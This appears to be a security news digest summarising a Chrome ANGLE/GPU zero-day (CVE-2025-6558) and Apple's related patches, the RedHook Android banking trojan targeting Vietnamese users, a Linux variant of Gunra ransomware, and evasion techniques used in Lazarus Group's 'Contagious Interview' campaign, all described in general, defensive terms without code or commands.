Chrome Vulnerability Impacts Multiple Platforms Including Apple Devices
Google’s Threat Analysis Group (TAG) has identified CVE-2025-6558, a high-severity zero-day vulnerability (CVSS 8.8) affecting the Chrome browser’s ANGLE and GPU components. This flaw occurs when Chrome fails to properly check untrusted input from websites, allowing specially crafted malicious web pages to break out of the browser’s secure “sandbox” a protective barrier designed to isolate web content from the rest of the device. In practical terms, a user only needs to visit a compromised or malicious website for an attacker to begin exploiting the vulnerability, potentially gaining unauthorized access to system resources. Google confirmed that this vulnerability has been actively exploited in the wild but has not yet released details about who is behind the attacks or how widespread they are. In response, Google issued patches for Chrome and credited researchers from its TAG team, Clément Lecigne and Vlad Stolyarov, for uncovering the flaw and bringing it to light. Although the issue originated in Chrome, it affects much more than just Google’s browser. Because the underlying vulnerable code is also used in other software projects, including Apple’s WebKit engine (which powers Safari), the scope extends across multiple platforms. Apple responded by pushing emergency security updates across iOS 18.6, iPadOS 18.6, and 17.7.9, macOS Sequoia 15.6, watchOS 11.6, tvOS 18.6, and visionOS 2.6. While there’s no evidence yet of targeted attacks against Apple users, the vulnerability’s ability to silently exploit users through ordinary web content makes it especially dangerous. Users on Windows, macOS, iOS, and Android should apply all available updates as soon as possible to stay protected. This incident highlights how a single flaw in a widely used browser component can quickly ripple across the entire tech ecosystem and why continuous patching and security vigilance remain critical, even for everyday browsing.
RedHook: Sophisticated Android Trojan Mimicking Government and Financial Institutions
RedHook is a recently identified Android banking trojan that poses a growing threat across regions, as it is not geographically restricted and can be adapted to target users in other countries by impersonating local institutions. Currently observed campaigns focus on Vietnamese entities, where the malware disguises itself as legitimate apps from trusted organizations, including government agencies, banks, and law enforcement. It spreads through phishing websites and deceptive domains hosted on platforms including AWS, delivering malicious APK files that prompt users to install what appear to be official apps. Once granted accessibility and overlay permissions, RedHook takes control of the device, monitoring activity, logging keystrokes, capturing screens, and issuing remote commands. Its persistent connection to a command-and-control server enables real-time data theft, including login credentials, banking details, and identity documents, without alerting the victim. Although the initial infection campaigns have been localized to Vietnam, RedHook’s infrastructure, delivery methods, and impersonation techniques are easily transferable to other regions. Code analysis reveals Chinese-language artifacts and ties to a broader ecosystem of phishing operations, suggesting development by a Chinese-speaking threat actor. Materials found in an exposed AWS S3 bucket link RedHook to earlier social engineering campaigns, indicating an evolution toward more complex, automated malware operations. The trojan supports over 30 remote commands—from remote app control to rebooting the device—demonstrating a level of functionality comparable to desktop RATs. This makes RedHook a high-risk tool capable of enabling financial fraud, identity theft, and surveillance on a broad scale, especially in environments where mobile device security remains under-resourced or poorly monitored.
Update: Gunra Ransomware Expands Targeting with New Linux Variant
The Gunra ransomware group has widened its reach by introducing a Linux variant, marking a shift from its original focus on Windows-based systems. This move reflects a growing trend in ransomware campaigns targeting multiple platforms. First detected in April 2025, Gunra has quickly established a presence across several countries, including the U.S., Japan, and Brazil, targeting industries ranging from healthcare and manufacturing to government and consulting. One of its most high-profile incidents reportedly involved the theft of 40 terabytes of data from a hospital in Dubai. With 14 victims listed on its leak site to date, Gunra has proven to be active and adaptable. The new Linux version utilizes runtime inputs to operate and offers customization options for encryption targets, speed, and stealth, thereby adding complexity for defenders and reducing the chances of recovery. What sets this variant apart is its use of multi-threaded encryption, with up to 100 parallel threads working to lock files efficiently. The malware employs a hybrid method to encrypt files, combining RSA and ChaCha20, and enables attackers to tailor the amount of data locked using command-line options. It avoids leaving ransom notes by default, favoring disruption over negotiation, which suggests its main goal is to cause operational damage. Trend Micro's analysis has helped provide insights and detection tools for security teams to track and block this threat early. Defending against Gunra requires applying layered protections, including regular patching, asset inventory, strong configuration controls, and user training. As ransomware groups move beyond traditional systems, Linux-based environments can no longer be overlooked in security planning.
Update: Lazarus Group Enhances Attack Techniques in Ongoing “Contagious Interview” Campaign
North Korea’s Lazarus Group continues to evolve its cyber operations by refining how it delivers malware in its “Contagious Interview” campaign. Instead of embedding harmful code directly into files, the group now designs its tools to fetch and execute the malware only after the program is already running. In one case, the malware sends a background request to a hidden server. It then quietly runs whatever it receives, bypassing traditional security tools that look for malicious code before a program starts. Another method involves breaking the malicious website address into smaller parts, making it more difficult for scanners to detect. The hackers also cleverly utilize legitimate services, including a trusted hosting platform, to conceal the malware, releasing the actual attack only when specific conditions are met; otherwise, the site appears harmless by serving something as simple as a website icon. A third method shows how Lazarus is getting even more creative. Instead of using well-known techniques that security software might recognize, they designed the malware to intentionally cause a fake error message and then exploit that error to sneak in and run the attack. Across all these methods, the primary goal is clear: to avoid detection by altering how and when the malicious code appears. These tactics make it harder for traditional security tools to keep up, especially ones that only scan code before it runs. The attackers appear to be utilizing automation or artificial intelligence to rapidly create and refine their attack methods, which could explain the occasional code errors. This trend indicates that organizations will need to enhance their ability to detect suspicious behavior in real-time and not rely solely on identifying known malicious files in advance.
